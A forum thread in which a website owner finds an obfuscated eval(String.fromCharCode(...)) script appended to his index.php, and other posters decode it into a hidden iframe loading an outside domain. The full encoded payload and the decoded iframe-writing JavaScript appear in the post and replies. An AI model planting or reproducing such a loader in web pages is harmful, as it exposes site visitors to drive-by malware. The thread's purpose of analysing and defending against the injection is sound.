Is this a Cross-Site Scripting Attack?

[ArizonaJohn]

Hello,

 

I have attached the code for my main page, index.php.  The last line of the code, which starts with "<script type="text/javascript">eval(String.fromCharCode(118,97..." is some script that I didn't add.

 

How did it get there?  Is it the result of a cross-site scripting attack?  How do I prevent it from happening in the future?

 

Thanks,

 

John

 

 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Title</title>

<link rel="stylesheet" type="text/css" href="tablestyles.css"> 

</head>

<body>

<div class="mainlinks"><a href="about.php" class="links">About</a><a href="testpage.php" class="links">New Testpage</a><a href="tablecreate.php" class="links">Table Create</a></div>

<div class="line"></div>


<div class="smalllogo"><a href="index.php"><img src="images/logo.png" alt="Title" width="170" height="45" border="0"/></a></div>
  
  
  <div class="searchbox">
  <form action="tsearch18.php" method="post">
  <label>Enter Topic:
  <input type="text" name="find" size="55"/>
  <input type="hidden" name="searching" value="yes" />
  <input type="submit" name="search" value="Search" />
  </label>

  </form>
  </div>

<div class="line2"></div>





<div class="copyright">©2009 Title</div>


</body>
</html>

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))</script>

[elis]

It looks like some sort of script injection.

http://www.google.com/search?q=eval(String.fromCharCode(118%2C97%2C114&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

 

I'm not actually very familiar with attacks, so I can't be of much help. However, it does look like you may be on the receiving end of one.

[newbtophp]

Its encoded javascript with malicious code within it.

 

It would be helpful fi you could post or PM you url?

[rv20]

Yeah it is just js in char code form is you do a chr(number) on those codes you will doecode, i wrote a little script to do that, the result is,

 

var xew=9871311;var ghg45="foxi";var w="on";var re6="serl.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3">'); function d(){var s=4345;} var rre=8828382

 

 

<?php

$str_string  = "118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,
118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50
,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100
,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34
,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,10
4,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34
,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,11
4,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50";

$pieces = explode(",", $str_string);

for($i=0;$i<count($pieces);$i++){
    $l = chr($pieces[$i]);
echo $l;
}


?>

[ArizonaJohn]

Hi vr20,

 

It looks like you know what this is.  But I didn't really follow your response-- what can I add to my site to prevent this JS in char code from being added in the future?

 

Thanks

[kickstart]

Hi

 

The code creates an iframe with a tiny image with a source on "h t t p : / / f o x i o n s e r l . c o m / " (spaces inserted to prevent it being a link).

 

I am not going there to see what it does!

 

All the best

 

Keith

[Daniel0]

Escape external content using functions like htmlentities before using it in an HTML context.

[rv20]

Not entirely sure what the src is but it seems to write an iframe of,

 

 

<iframe src="http://foxionserl.com/width="1"eight="3">

 

I ran it and it opened arcrobat reader for a few secs then nothing.

 

The domain foxionserl is registered to Herbert Elliott

 

http://www.whois.net/whois/foxionserl.com

 

[ArizonaJohn]

Thanks everyone for the responses.

 

So should I just say $find = htmlentities($find); ?

[kickstart]

Hi

 

Yes, but that might not be how your pages got infected.

 

All the best

 

Keith

[ArizonaJohn]

According to this thread: http://www.directadmin.com/forum/showthread.php?p=157791, it might have something to do with FTP access.

 

All I use if FTP.  How do I make changes to my site without it?

[rv20]

delete!

[stelthius]

Well the site it links to has a little tiny image on it and calls a php file - <iframe src='/image/pfgt.php' width=1 height=3></iframe>

 

[waynew]

Not entirely sure what the src is but it seems to write an iframe of,

 

 

<iframe src="http://foxionserl.com/width="1"eight="3">

 

I ran it and it opened arcrobat reader for a few secs then nothing.

 

The domain foxionserl is registered to Herbert Elliott

 

http://www.whois.net/whois/foxionserl.com

 

 

Scan your computer.